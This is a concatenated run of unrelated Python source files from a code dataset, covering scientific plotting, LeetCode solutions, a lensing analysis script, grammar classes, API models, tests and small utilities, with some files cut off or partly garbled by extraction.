str(ins) + '_T' + str(t)\n + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'histograms/' + title\n + '_INS' + str(ins) + '_T' + str(t)\n + '.png')\n ins_count += 1\n ins += 1 if ins_count % 2 == 0 else 0\n pcount += 1 if tcount % 5 == 0 else 0\n plt.close('all')\n\n def paint_corners(self):\n \"\"\"Create corner plots. Cold chain only.\"\"\"\n print('\\n\\t\\tPAINTING CORNERS.')\n titles = ['P', 'K', r'$\\phi$', 'e', r'$\\omega$']\n if not self.kplanets:\n print('No cornerplots for K0.')\n return\n for k in tqdm(range(self.kplanets), desc='Brush number'):\n labels = [t + ' ' + str(k + 1) + '\\n' + u\n for t, u in zip(\n self.chain_titles[:-1 - self.nins],\n self.chain_units[:-1]\n )]\n fig = corner.corner(\n self.cold[:, k * 5:(k + 1) * 5],\n plot_contours=True,\n fill_contours=False,\n plot_datapoints=True,\n no_fill_contours=True,\n max_n_ticks=3\n )\n params = self.__get_params(k)\n params_lo, params_up = self.__get_CI_params(k, .68)\n\n axes = sp.array(fig.axes).reshape((5, 5))\n\n for i in range(5):\n ax = axes[i, i]\n ax.axvline(params[i], color=self.corner_med_c,\n linestyle=self.corner_med_style)\n ax.axvline(params_lo[i], color=self.corner_v_c,\n linestyle=self.corner_v_style)\n ax.axvline(params_up[i], color=self.corner_v_c,\n linestyle=self.corner_v_style)\n t = titles[i] + '={:.2f}'.format(params[i]) + \\\n r'$^{+' + '{:.2f}'.format(params_up[i] - params[i]) + \\\n r'}_{-' + '{:.2f}'.format(params[i] - params_lo[i]) + r'}$'\n\n ax.set_title(t, fontsize=self.corner_fontsize,\n fontname=self.fontname)\n\n for yi in range(5):\n for xi in range(yi):\n ax = axes[yi, xi]\n if xi == 0:\n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(self.corner_tick_fontsize)\n tick.label.set_fontname(self.fontname)\n ax.set_ylabel(\n labels[yi],\n labelpad=self.corner_labelpad,\n fontsize=self.corner_fontsize,\n fontname=self.fontname\n )\n if yi == 4:\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(self.corner_tick_fontsize)\n tick.label.set_fontname(self.fontname)\n ax.set_xlabel(\n labels[xi],\n labelpad=self.corner_labelpad,\n fontsize=self.corner_fontsize,\n fontname=self.fontname\n )\n ax.axvline(params[xi], color=self.corner_med_c,\n linestyle=self.corner_med_style)\n ax.axhline(params[yi], color=self.corner_med_c,\n linestyle=self.corner_med_style)\n ax.plot(params[xi], params[yi], self.corner_marker)\n axes[-1, -1].set_xlabel(\n labels[-1],\n labelpad=self.corner_labelpad,\n fontsize=self.corner_fontsize,\n fontname=self.fontname\n )\n for tick in axes[-1, -1].xaxis.get_major_ticks():\n tick.label.set_fontsize(self.corner_tick_fontsize)\n tick.label.set_fontname(self.fontname)\n if self.pdf:\n plt.savefig(self.working_dir + 'corners/' +\n 'corner_K' + str(k + 1) + '.pdf')\n if self.png:\n plt.savefig(self.working_dir + 'corners/' +\n 'corner_K' + str(k + 1) + '.png')\n plt.close('all')\n\n def __read_config(self):\n \"\"\"Read configuration file for plotting.\"\"\"\n # TODO: implement.\n self.phase_figsize = (20, 10)\n self.full_figsize = (20, 10)\n self.chain_figsize = (12, 7)\n self.post_figsize = (12, 7)\n self.hist_figsize = (12, 7)\n self.phase_cmap = 'cool_r'\n self.full_cmap = 'cool_r'\n self.phase_size = 100\n self.full_size = 100\n self.chain_size = 20\n self.chain_cmap = 'viridis'\n self.post_size = 20\n self.post_ticknum = 10\n self.post_alpha = .8\n self.post_cmap = 'viridis'\n self.post_v_color = 'red'\n self.post_v_linestyle = '--'\n self.post_v_linewidth = 2\n self.post_v_alpha = .7\n self.label_fontsize = 22\n self.num_bins = 12\n self.hist_facecolor = 'blue'\n self.hist_alpha = .5\n self.CI_color = 'mediumseagreen'\n self.error_color = 'k'\n self.fontname = 'serif'\n self.corner_med_c = 'firebrick'\n self.corner_v_c = 'lightcoral'\n self.corner_v_style = '-.'\n self.corner_med_style = '--'\n self.tick_labelsize = 20\n self.cbar_labelpad = 30\n self.corner_fontsize = 20\n self.corner_tick_fontsize = 15\n self.corner_labelpad = 15\n self.corner_marker = 'sr'\n pass\n","sub_path":"emperors_canvas.py","file_name":"emperors_canvas.py","file_ext":"py","file_size_in_byte":37132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"367566811","text":"\nclass Solution(object):\n\n def removeDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n\n No need to enumerate\n\n ACE\n 80 ms\n \"\"\"\n writeidx = 0\n for x in nums:\n if writeidx < 2 or nums[writeidx-2] != x:\n nums[writeidx] = x\n writeidx += 1\n return writeidx\n\n def removeDuplicatesV2(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n\n ACE\n 100 ms\n \"\"\"\n writeidx = 0\n for i, x in enumerate(nums):\n if writeidx < 2 or nums[writeidx-2] != x:\n nums[writeidx] = x\n writeidx += 1\n return writeidx\n\n def removeDuplicatesV1(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n\n ACE\n 100 ms\n \"\"\"\n writeidx = 0\n for i, x in enumerate(nums):\n if writeidx >= 2 and nums[writeidx-2] == x:\n continue\n else:\n nums[writeidx] = x\n writeidx += 1\n return writeidx\n\nif __name__ == '__main__':\n s = Solution()\n tests = [\n [1,1,1,2,2,3]\n ]\n for t in tests:\n print(t)\n res = s.removeDuplicates(t)\n print(t[:res])","sub_path":"080_remove_duplicates_from_sorted_array_ii.py","file_name":"080_remove_duplicates_from_sorted_array_ii.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"225050869","text":"#runing taus by quadrant.\nimport os\ntoday = '08-04-19_'\ndef parse_args():\n import argparse\n parser = argparse.ArgumentParser(description='Correlation galaxies and reserved stars')\n \n parser.add_argument('--metacal_cat',\n #default='/home2/dfa/sobreira/alsina/catalogs/y3_master/Y3_mastercat_v2_6_20_18_subsampled.h5',\n default='/home2/dfa/sobreira/alsina/catalogs/y3_master/Y3fullmaster/Y3_mastercat_v2_6_20_18.h5', \n help='Full Path to the Metacalibration catalog')\n parser.add_argument('--piff_cat',\n default='/home2/dfa/sobreira/alsina/catalogs/y3a1-v29',\n help='Full Path to the Only stars Piff catalog')\n parser.add_argument('--exps_file',\n default='/home/dfa/sobreira/alsina/DESWL/psf/ally3.grizY',\n #default='/home/dfa/sobreira/alsina/DESWL/psf/testexp',\n help='list of exposures (in lieu of separate exps)')\n parser.add_argument('--bands', default='riz', type=str,\n help='Limit to the given bands')\n parser.add_argument('--bandcombo', default=False,\n action='store_const', const=True,\n help='run rho2 for all combination of bands, if false run particular combination defined in band')\n parser.add_argument('--use_reserved', default=True,\n action='store_const', const=True,\n help='just use the objects with the RESERVED flag')\n parser.add_argument('--frac', default=1., type=float,\n help='Choose a random fraction of the input stars')\n parser.add_argument('--mod', default=True,\n action='store_const', const=True,\n help='If true it substracts the mean to each field before calculate correlations')\n parser.add_argument('--sn', default=True,\n action='store_const', const=True,\n help='If true multiply by 2 the variances of all correlations. Shape-noise error.')\n parser.add_argument('--outpath', default='/home2/dfa/sobreira/alsina/catalogs/output/alpha-beta-gamma',\n help='location of the output of the files')\n parser.add_argument('--tomo', default=False,\n action='store_const', const=True,\n help='Run all tomographic correlations')\n parser.add_argument('--nz_source',\n default='/home2/dfa/sobreira/alsina/catalogs/y3_master/nz_source_zbin.h5',\n help='Full Path to the Only stars Piff catalog')\n \n \n args = parser.parse_args()\n\n return args\n\n \ndef main():\n import sys\n sys.path.insert(0, '/home/dfa/sobreira/alsina/alpha-beta-gamma/code/src')\n #sys.path.insert(0, '/global/cscratch1/sd/alsina/alpha-beta-gamma/code/src')\n \n import numpy as np\n from read_psf_cats import read_data, toList, read_h5\n from run_rho import do_tau_stats\n import h5py as h\n \n args = parse_args()\n\n #Make directory where the ouput data will be\n outpath = os.path.expanduser(args.outpath)\n try:\n if not os.path.exists(outpath):\n os.makedirs(outpath)\n except OSError:\n if not os.path.exists(outpath): raise\n \n\n #Reading metacal catalog\n #galkeys = ['ra']\n #blabla = read_h5(args.metacal_cat, 'catalog/metacal/sheared_1m', galkeys )\n \n #Reading Mike stars catalog\n keys = ['ra', 'dec','obs_e1', 'obs_e2', 'obs_T',\n 'piff_e1', 'piff_e2', 'piff_T', 'mag']\n \n exps = toList(args.exps_file)\n data_stars, bands, tilings = read_data(exps, args.piff_cat , keys,\n limit_bands=args.bands,\n use_reserved=args.use_reserved)\n print(\"Objects\", len(data_stars))\n data_stars = data_stars[data_stars['mag']<20]\n print(\"Objects with magnitude <20\", len(data_stars))\n meanra = np.mean(data_stars['ra'])\n meandec = np.mean(data_stars['dec']) \n \n \n if(args.tomo):\n #Make directory where the ouput data will be\n ipath = os.path.join(args.outpath, 'tomo_taus' )\n outpath = os.path.expanduser(ipath)\n try:\n if not os.path.exists(outpath):\n os.makedirs(outpath)\n except OSError:\n if not os.path.exists(outpath): raise\n print('Starting Tomography!')\n galkeys = ['ra','dec','e_1','e_2','R11','R22']\n data_gal = read_h5(args.metacal_cat, 'catalog/metacal/unsheared', galkeys )\n print(\"Total objects in catalog:\", len(data_gal))\n dgamma = 2*0.01\n f = h.File(args.metacal_cat, 'r')\n index = f['index']\n select = np.array(index['select'])\n select_1p = np.array(index['select_1p']); select_1m = np.array(index['select_1m'])\n select_2p = np.array(index['select_2p']); select_2m = np.array(index['select_2m']) \n\n n = h.File(args.nz_source, 'r')\n zbin_array = np.array(n['nofz/zbin'])\n\n nbins = 4\n for bin_c in range(nbins):\n print('Starting bin!', bin_c)\n ind = np.where( zbin_array==bin_c )[0]\n ind_1p = np.where(np.array(n['nofz/zbin_1p'])==bin_c)\n ind_1m = np.where(np.array(n['nofz/zbin_1m'])==bin_c)\n ind_2p = np.where(np.array(n['nofz/zbin_2p'])==bin_c)\n ind_2m = np.where(np.array(n['nofz/zbin_2m'])==bin_c)\n R11s = (data_gal['e_1'][select_1p][ind_1p].mean() -\n data_gal['e_1'][select_1m][ind_1m].mean() )/dgamma\n R22s = (data_gal['e_2'][select_2p][ind_2p].mean() -\n data_gal['e_2'][select_2m][ind_2m].mean() )/dgamma\n Rs = [R11s, R22s]\n\n patchstars = [];patchgal = []\n patchstars.append((data_stars['ra']>meanra)&(data_stars['dec']>meandec))\n patchstars.append((data_stars['ra']meandec))\n patchstars.append((data_stars['ra']meanra)&(data_stars['dec']meanra)&(data_gal[select][ind]['dec']>meandec))\n patchgal.append((data_gal[select][ind]['ra']meandec))\n patchgal.append((data_gal[select][ind]['ra']meanra)&(data_gal[select][ind]['dec']meanra)&(data_stars['dec']>meandec))\n patchstars.append((data_stars['ra']meandec))\n patchstars.append((data_stars['ra']meanra)&(data_stars['dec']meanra)&(data_gal[select]['dec']>meandec))\n patchgal.append((data_gal[select]['ra']meandec))\n patchgal.append((data_gal[select]['ra']meanra)&(data_gal[select]['dec'] {1}\".format(''.join(self.alpha), ''.join(self.beta))\n\n def __cmp__(self, other):\n if (isinstance(other, ProductionRule)):\n if (self.alpha == other.alpha and self.beta == other.beta):\n return True\n\n return False\n\n\"\"\"\"\"\"\nclass UnrestrictedGrammar:\n def __init__(self, Terminals, Rules, Start):\n\n NonTerminals = set()\n\n if not(isinstance(Terminals, set)):\n raise TypeError\n if not(isinstance(Rules, set)):\n raise TypeError\n if not(isinstance(Start, str)):\n raise TypeError\n\n for R in Rules:\n if not(isinstance(R, ProductionRule)):\n raise TypeError\n\n if (R.alpha == []):\n print(R + ', is an invalid Rule.')\n raise ValueError\n\n for c in R.alpha:\n if (c not in Terminals):\n NonTerminals.add(c)\n for c in R.beta:\n if (c not in Terminals):\n NonTerminals.add(c)\n\n if (Start not in NonTerminals):\n print(NonTerminals)\n print(Start + ' is an invalid Start.')\n raise ValueError\n\n self.NonTerminals = NonTerminals\n self.Terminals = Terminals\n self.Rules = Rules\n self.Start = Start\n\n def parse(self, String):\n raise HaltError\n\n\"\"\"\"\"\"\nclass ContextSensitiveGrammar(UnrestrictedGrammar):\n def __init__(self, Terminals, Rules, Start):\n UnrestrictedGrammar.__init__(self, Terminals, Rules, Start)\n\n flagSe = False\n for R in self.Rules:\n flagCF = False\n for i in range(len(R.alpha)):\n a1 = R.alpha[:i]\n n1 = R.alpha[i]\n b1 = R.alpha[i + 1:]\n\n if (n1 in self.NonTerminals):\n a2 = R.beta[:i]\n n2 = R.beta[i:len(R.beta) - len(b1)]\n b2 = R.beta[len(R.beta) - len(b1):]\n\n if (a1 == a2 and b1 == b2):\n if (n2 == []):\n if (R.alpha == [self.Start]):\n flagCF = True\n flagSe = True\n else:\n flagCF = True\n\n if not(flagCF):\n print('The following rule, ' + str(R) + ', is not context sensitive.')\n raise ValueError\n\n if (flagSe):\n for R in Rules:\n for c in R.beta:\n if (c == Start):\n print('The following rule, ' + str(R) + ', is not context sensitive.')\n raise ValueError\n\n\"\"\"\"\"\"\nclass ContextFreeGrammar(ContextSensitiveGrammar):\n def __init__(self, Terminals, Rules, Start):\n ContextSensitiveGrammar.__init__(self, Terminals, Rules, Start)\n\n for R in Rules:\n if (len(R.alpha) > 1):\n print('The following rule, ' + str(R) + ', is not context free.')\n raise ValueError\n\n\"\"\"\"\"\"\nclass RegularGrammar(ContextFreeGrammar):\n def __init__(self, Terminals, Rules, Start):\n ContextFreeGrammar.__init__(self, Terminals, Rules, Start)\n\n LRG = False\n RRG = False\n for R in self.Rules:\n nTcount = 0\n for c in R.beta:\n if (c in self.NonTerminals):\n nTcount += 1\n if (nTcount >= 2):\n print('The following rule, ' + str(R) + ', is not regular.')\n raise ValueError\n\n for i in range(len(R.beta)):\n n = R.beta[i]\n if (n in self.NonTerminals):\n nL = R.beta[:i]\n nR = R.beta[i + 1:]\n\n if (nL != []):\n RRG = True\n if (nR != []):\n LRG = True\n\n if (RRG and LRG):\n print('The following rule, ' + str(R) + ', is not regular.')\n raise ValueError","sub_path":"Grammar.py","file_name":"Grammar.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"615479342","text":"# coding: utf-8\n\n\"\"\"\n Xero Finance API\n\n The Finance API is a collection of endpoints which customers can use in the course of a loan application, which may assist lenders to gain the confidence they need to provide capital. # noqa: E501\n\n Contact: api@xero.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport re # noqa: F401\n\nfrom xero_python.models import BaseModel\n\n\nclass ContactTotalDetail(BaseModel):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n \"total_paid\": \"float\",\n \"total_outstanding\": \"float\",\n \"total_credited_un_applied\": \"float\",\n }\n\n attribute_map = {\n \"total_paid\": \"totalPaid\",\n \"total_outstanding\": \"totalOutstanding\",\n \"total_credited_un_applied\": \"totalCreditedUnApplied\",\n }\n\n def __init__(\n self, total_paid=None, total_outstanding=None, total_credited_un_applied=None\n ): # noqa: E501\n \"\"\"ContactTotalDetail - a model defined in OpenAPI\"\"\" # noqa: E501\n\n self._total_paid = None\n self._total_outstanding = None\n self._total_credited_un_applied = None\n self.discriminator = None\n\n if total_paid is not None:\n self.total_paid = total_paid\n if total_outstanding is not None:\n self.total_outstanding = total_outstanding\n if total_credited_un_applied is not None:\n self.total_credited_un_applied = total_credited_un_applied\n\n @property\n def total_paid(self):\n \"\"\"Gets the total_paid of this ContactTotalDetail. # noqa: E501\n\n Total paid invoice and cash value for the contact within the period. # noqa: E501\n\n :return: The total_paid of this ContactTotalDetail. # noqa: E501\n :rtype: float\n \"\"\"\n return self._total_paid\n\n @total_paid.setter\n def total_paid(self, total_paid):\n \"\"\"Sets the total_paid of this ContactTotalDetail.\n\n Total paid invoice and cash value for the contact within the period. # noqa: E501\n\n :param total_paid: The total_paid of this ContactTotalDetail. # noqa: E501\n :type: float\n \"\"\"\n\n self._total_paid = total_paid\n\n @property\n def total_outstanding(self):\n \"\"\"Gets the total_outstanding of this ContactTotalDetail. # noqa: E501\n\n Total outstanding invoice value for the contact within the period. # noqa: E501\n\n :return: The total_outstanding of this ContactTotalDetail. # noqa: E501\n :rtype: float\n \"\"\"\n return self._total_outstanding\n\n @total_outstanding.setter\n def total_outstanding(self, total_outstanding):\n \"\"\"Sets the total_outstanding of this ContactTotalDetail.\n\n Total outstanding invoice value for the contact within the period. # noqa: E501\n\n :param total_outstanding: The total_outstanding of this ContactTotalDetail. # noqa: E501\n :type: float\n \"\"\"\n\n self._total_outstanding = total_outstanding\n\n @property\n def total_credited_un_applied(self):\n \"\"\"Gets the total_credited_un_applied of this ContactTotalDetail. # noqa: E501\n\n Total unapplied credited value for the contact within the period. # noqa: E501\n\n :return: The total_credited_un_applied of this ContactTotalDetail. # noqa: E501\n :rtype: float\n \"\"\"\n return self._total_credited_un_applied\n\n @total_credited_un_applied.setter\n def total_credited_un_applied(self, total_credited_un_applied):\n \"\"\"Sets the total_credited_un_applied of this ContactTotalDetail.\n\n Total unapplied credited value for the contact within the period. # noqa: E501\n\n :param total_credited_un_applied: The total_credited_un_applied of this ContactTotalDetail. # noqa: E501\n :type: float\n \"\"\"\n\n self._total_credited_un_applied = total_credited_un_applied\n","sub_path":"xero_python/finance/models/contact_total_detail.py","file_name":"contact_total_detail.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"217137915","text":"class Solution:\n def trap(self, height: List[int]) -> int:\n idx_map = defaultdict(list)\n sorted_height = sorted(height, reverse=True)\n # idx map (num -> idx)を作っておく\n for i, h in enumerate(height):\n idx_map[h].append(i)\n # heightに出てきた高さを,最大値から取り出す\n i = 0\n ans = 0\n left_max = len(height)\n right_max = -1\n while i < len(sorted_height):\n # 各高さについて,水が溜まる量を加算する\n cur = sorted_height[i]\n l = idx_map[cur][0]\n r = idx_map[cur][-1]\n if l < left_max:\n left_max = l\n if r > right_max:\n right_max = r\n i += len(idx_map[cur])\n if left_max == right_max:\n continue\n for j in range(left_max+1, right_max):\n if height[j] < cur:\n ans += (cur - height[j])\n height[j] = cur\n return ans\n","sub_path":"LeetCode/Hard/42TrappingRainWater.py","file_name":"42TrappingRainWater.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"590477972","text":"\ndef count_boomerangs(lst):\n result = 0\n if len(lst) < 3:\n return 0\n for i in range(len(lst) - 2):\n if (lst[i] == lst[i+2] and lst[i] != lst[i+1]):\n result += 1\n return result\n\n","sub_path":"25zkiePFYRpickxnB_16.py","file_name":"25zkiePFYRpickxnB_16.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"132573676","text":"\"\"\"\nmodel.py\n\nContains the Model class, which stores the definitions of the given model\n\"\"\"\nfrom math import sqrt\n\nclass Model(object):\n\n def __init__(self, n_ef, n_fields, mpsi, m0):\n self.n_ef = n_ef\n self.n_fields = n_fields\n self.m0 = m0\n self.mpsi = mpsi\n # Compute derivative quantities\n self.mupsi2 = 3 - sqrt(9 - 4*mpsi**2)\n self.muphi2 = m0**2\n self.lamda = -3/2 + sqrt(9/4 + m0**2)\n self.beta = 1/(2*self.lamda)\n","sub_path":"stack/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"169358839","text":"from datetime import datetime\nfrom typing import List\n\nimport pytest\n\nfrom django_unicorn.components import UnicornView\nfrom django_unicorn.views.action_parsers.utils import set_property_value\nfrom example.coffee.models import Flavor\n\n\nclass FakeComponent(UnicornView):\n string = \"property_view\"\n integer = 99\n datetime = datetime(2020, 1, 1)\n array: List[str] = []\n model = Flavor(name=\"initial-flavor\")\n queryset = Flavor.objects.none()\n\n\ndef test_set_property_value_str():\n component = FakeComponent(component_name=\"test\", component_id=\"12345678\")\n assert \"property_view\" == component.string\n\n set_property_value(\n component,\n \"string\",\n \"property_view_updated\",\n {\"string\": \"property_view_updated\"},\n )\n\n assert \"property_view_updated\" == component.string\n\n\ndef test_set_property_value_int():\n component = FakeComponent(component_name=\"test\", component_id=\"12345678\")\n assert 99 == component.integer\n\n set_property_value(component, \"integer\", 100, {\"integer\": 100})\n\n assert 100 == component.integer\n\n\ndef test_set_property_value_datetime():\n component = FakeComponent(component_name=\"test\", component_id=\"12345678\")\n assert datetime(2020, 1, 1) == component.datetime\n\n set_property_value(\n component, \"datetime\", datetime(2020, 1, 2), {\"datetime\": datetime(2020, 1, 2)}\n )\n\n assert datetime(2020, 1, 2) == component.datetime\n\n\ndef test_set_property_value_model():\n component = FakeComponent(component_name=\"test\", component_id=\"12345678\")\n assert \"initial-flavor\" == component.model.name\n\n set_property_value(\n component,\n \"model\",\n Flavor(name=\"test-flavor\"),\n {\"model\": {\"name\": \"test-flavor\"}},\n )\n\n assert \"test-flavor\" == component.model.name\n\n\n@pytest.mark.django_db\ndef test_set_property_value_queryset():\n component = FakeComponent(component_name=\"test\", component_id=\"12345678\")\n assert len(component.queryset) == 0\n\n flavor_one = Flavor(name=\"test-flavor-one\")\n flavor_one.save()\n flavor_two = Flavor(name=\"test-flavor-two\")\n flavor_two.save()\n queryset = Flavor.objects.all()[:2]\n\n set_property_value(\n component,\n \"queryset\",\n queryset,\n {\"queryset\": [{\"name\": \"test-flavor-one\"}, {\"name\": \"test-flavor-two\"}]},\n )\n\n assert len(queryset) == 2\n","sub_path":"tests/views/action_parsers/utils/test_set_property_value.py","file_name":"test_set_property_value.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"159696242","text":"import numpy as np\nfrom project_1 import Molecule, a, b\n#Butadiene\n\nbutadiene_H = np.matrix([[a, b, 0, 0], [b, a, b, 0],\n [0, b, a, b], [0, 0, b, a]])\nbutadiene = Molecule(\"Butadine\", butadiene_H, 4, 4, 2)\n\nbutadiene.set_constants(0, -1)\nbutadiene.generate_eigen()\nbutadiene.find_deloc_energy()\nbutadiene.energy_level_plot()\nbutadiene.find_charge_density()\nbutadiene.find_bond_order()\nprint(butadiene)\n","sub_path":"BONDs/Butadiene.py","file_name":"Butadiene.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"201974950","text":"import os\nimport argparse\nfrom core.models import SimpleNN\nfrom core.utils import randomize, cross_validation, save_normalization_model, reload_normalization_model\nfrom core.train_nn import train\nfrom core.data_preparation import Predictive\nfrom core.predict import predict\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--csv-file\", type=str, default=\"./csv_files/predictive_maintenance_dataset.csv\",\n help=\"input csv file path\")\n parser.add_argument(\"--mode\", type=str, default=\"train\", help=\"application mode, either train or deploy\")\n args = parser.parse_args()\n assert os.path.exists(os.path.normpath(args.csv_file)), \"csv file not found\"\n assert args.mode in [\"train\", \"predict\"], \"specified mode is not supported\"\n\n csv_path = os.path.normpath(args.csv_file)\n mode = args.mode\n save_path = os.path.join(os.getcwd(), 'nn-model-checkpoints')\n\n task = Predictive(csv_path)\n df = task.clean_data()\n data, label = task.get_data_label(df)\n\n no_features = data.shape[1]\n\n if mode == \"train\":\n data, label = randomize(data, label)\n x_train, y_train, x_validation, y_validation, x_test, y_test = cross_validation(data, label,\n is_regression=False)\n save_normalization_model(x_train, \"nn-norm-checkpoints\")\n x_train = reload_normalization_model(x_train, \"nn-norm-checkpoints\")\n x_validation = reload_normalization_model(x_validation, \"nn-norm-checkpoints\")\n x_test = reload_normalization_model(x_test, \"nn-norm-checkpoints\")\n\n model = SimpleNN(no_features=no_features, no_labels=2, hidden_layers=[100, 50])\n model.build_graph()\n train(model, save_path, x_train, y_train, x_validation, y_validation)\n predict(model, save_path, x_test, y_test, is_regression=False)\n else:\n model = SimpleNN(no_features=no_features, no_labels=2, hidden_layers=[100, 50])\n model.build_graph()\n data = reload_normalization_model(data, \"nn-norm-checkpoints\")\n predict(model, save_path, data, label, is_regression=False)\n","sub_path":"main_predictive.py","file_name":"main_predictive.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"35442392","text":"from lib.socket_handlers import SocketHandler\nfrom lib.requests import ReadRequest, ReadResponse\nfrom lib.loopable import Loopable\nfrom base_server import BaseServer\n\n\n# we are going to be reading data back from it's storage spot\n# and streaming it @ someone else\n\n\nclass ReadServer(BaseServer):\n\n def make_work_request(self):\n request = ReadRequest()\n self.bb_client.read_wait(request, self.handle_request)\n\n def handle_request(self, t):\n super(ReadServer,self).handle_request(t)\n\n request = ReadRequest(t)\n response = ReadResponse(key=request.key,\n url=self.get_url(),\n port=self.get_port())\n\n handler = ReadHandler(self, stream_id, request.offset,\n (response.url,response.port))\n\n\nclass ReadHandler(object):\n chunk_size = 1024\n\n def __init__(self, server, stream_id, offset, host_port):\n # abs path to file to be read\n self.read_path = None\n self.server = server\n self.stream_id = stream_id\n self.host_port = host_port\n\n # number of seconds in the past we should read from the stream\n self.offset = offset\n\n # we need to find the correct file to read from\n self.setup_read_point()\n\n # now we need to setup a read handler from that file\n # at the given offset\n self.setup_file_handler()\n\n # now setup our socket handler to listen on given host / port\n self.out_handler = SocketHandler(self.host_port)\n\n # whenever data is sent from the socket we want to\n # send more\n self.out_handler.on('send', self.handle_send)\n\n # prime the socket with some data\n self.send_data(self.chunk_size)\n\n def setup_read_point(self):\n # figure out the date/tim ewe're reading from\n epoch = time.time() - self.offset\n s = datetime.fromtimestamp(epoch)\n # get it's rel path\n r_path = os.sep.join([s.year,s.month,s.day, self.stream_id,\n s.hour,s.minute])\n # where's it actually saved?\n save_root = self.server.config.get('stream_save_root')\n path = os.path.join(save_root,r_path)\n self.read_path = path\n\n def setup_file_handler(self):\n # open a file handler to the file\n self.read_fh = open(self.read_path,'rb')\n\n # now seek to the offset we want\n\n\n def handle_send(self, d):\n # we want there to always be data waiting to go out\n # so when we send some, read in the next chunk and\n # send it to the socket to go out\n data_len = len(d)\n self.send_data(data_len)\n\n def send_data(self, l):\n # we want ot send the next chunk of data of len l\n data = self.fh.read(l)\n self.out_fh.push(data)\n\n\ndef find_video(storage_root,stream_id,dt):\n \"\"\"\n returns the abs path to the video file at the given\n date time for the given stream off the given storage root\n if the file is not found returns none\n \"\"\"\n\n # start by finding the hour we want\n r_hr_path = os.sep.join([dt.year,dt.month,dt.day,stream_id,s.hour])\n hr_path = os.path.abspath(storage_root,r_hr_path)\n if not os.path.exists(hr_path):\n return None\n\n # now that we know the folder for the hour exists, lets see if we can\n # find the video file for the exact time we want\n # to estimate\n","sub_path":"servers/read_server.py","file_name":"read_server.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"22122012","text":"#! animatingProjectile.py\n# Animates the trajectory of an object in projectile motion\n\nfrom matplotlib import pyplot as plt;\nfrom matplotlib import animation;\nimport math;\ng = 9.81;\n\ndef get_intervals(u,theta):\n t_flight = 2*u*math.sin(theta)/g;\n intervals = [];\n start = 0;\n interval = 0.041667; # See if you can tweak this to match real life. 24fps\n while start 0:\n instance.__dict__[self.strange_name] = value\n else:\n raise ValueError('%s must > 0' % self.strange_name)\n\n\nclass LineItem:\n\n weight = Quantity('name')\n price = Quantity('price')\n\n def __init__(self, description, weight, price):\n self.description = description\n self.weight = weight\n self.price = price\n self.test = Quantity('test')\n\n def subtotal(self):\n return self.weight * self.price\n\n\nl = LineItem('lineitem', 100, 2.0)\nprint(l.weight)\nprint(l.test) # <__main__.Quantity object at 0x03B8D610>","sub_path":"chap20 Attribute Descriptors/bulfood_v3.py","file_name":"bulfood_v3.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"7647928","text":"from typing import Callable, Union, Any\n\nimport numpy as np\nfrom casadi import sum1, if_else, vertcat, lt, SX, MX\nimport biorbd_casadi as biorbd\n\nfrom .path_conditions import Bounds\nfrom .penalty import PenaltyFunctionAbstract, PenaltyOption, PenaltyNodeList\nfrom ..interfaces.biorbd_interface import BiorbdInterface\nfrom ..misc.enums import Node, InterpolationType, PenaltyType, ConstraintType\nfrom ..misc.fcn_enum import FcnEnum\nfrom ..misc.options import OptionList\n\n\nclass Constraint(PenaltyOption):\n \"\"\"\n A placeholder for a constraint\n\n Attributes\n ----------\n min_bound: np.ndarray\n The vector of minimum bound of the constraint. Default is 0\n max_bound: np.ndarray\n The vector of maximal bound of the constraint. Default is 0\n \"\"\"\n\n def __init__(\n self,\n constraint: Any,\n min_bound: Union[np.ndarray, float] = None,\n max_bound: Union[np.ndarray, float] = None,\n quadratic: bool = False,\n phase: int = -1,\n **params: Any,\n ):\n \"\"\"\n Parameters\n ----------\n constraint: ConstraintFcn\n The chosen constraint\n min_bound: np.ndarray\n The vector of minimum bound of the constraint. Default is 0\n max_bound: np.ndarray\n The vector of maximal bound of the constraint. Default is 0\n phase: int\n The index of the phase to apply the constraint\n quadratic: bool\n If the penalty is quadratic\n params:\n Generic parameters for options\n 